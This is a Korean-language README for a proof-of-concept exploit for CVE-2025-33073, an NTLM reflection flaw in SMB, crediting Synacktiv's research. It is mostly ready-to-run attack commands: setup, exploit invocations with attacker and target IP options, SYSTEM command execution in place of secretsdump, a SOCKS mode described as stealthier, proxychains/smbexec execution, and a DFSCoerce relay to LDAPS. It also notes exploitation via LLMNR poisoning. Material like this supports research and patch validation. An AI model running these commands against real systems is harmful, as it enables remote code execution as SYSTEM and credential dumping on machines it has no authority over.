
NTLM 리플렉션 SMB 취약점에 대한 PoC 익스플로잇.
NTLM 리플렉션 SMB 결함에 대한 PoC 익스플로잇.
모든 공로는 공식 연구에 있습니다:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (대부분의 패키지가 사전 설치되어 있음).
도구는 자동으로 가상 환경을 사용합니다. 설정하려면 다음을 실행하세요:
./setup.sh
이 명령은 가상 환경을 생성하고 ldap3-bleeding-edge==2.10.1.1337을 포함한 모든 필수 종속성을 설치합니다.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
사용자 지정 명령
secretsdump를 실행하는 대신 사용자 지정 명령을 실행할 수 있습니다.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
SYSTEM으로 유효한 연결이 설정된 후 명령을 더 은밀하게 실행하기 위한 옵션입니다. 여기서는 --target과 --target-ip가 동일해야 합니다.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
또한 SAM을 덤프하는 대신 proxychains를 통해 사용자 지정 명령을 실행할 수 있습니다.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

SMB 서명이 활성화된 상태에서 리플렉션이 실제로 작동하지 않는지 확인하기 위한 연구가 수행되었으며, 그 결과 패킷에서 SIGN/SEAL을 제거하면 SMB에서 LDAPS로 릴레이할 수 있는 버그를 발견했습니다. 일반적으로 MIC 때문에 이는 불가능합니다.
감사 인사:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
장치와 동일한 브로드캐스트 도메인에 있고 LLMNR 중독(poisoning)에 취약한 경우 DNS 레코드를 등록하지 않고도 장치를 익스플로잇할 수 있습니다.

로컬 NTLM 인증이 수행됨

로컬 NTLM 인증이 수행되지 않아 FAILED 시도가 발생함

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073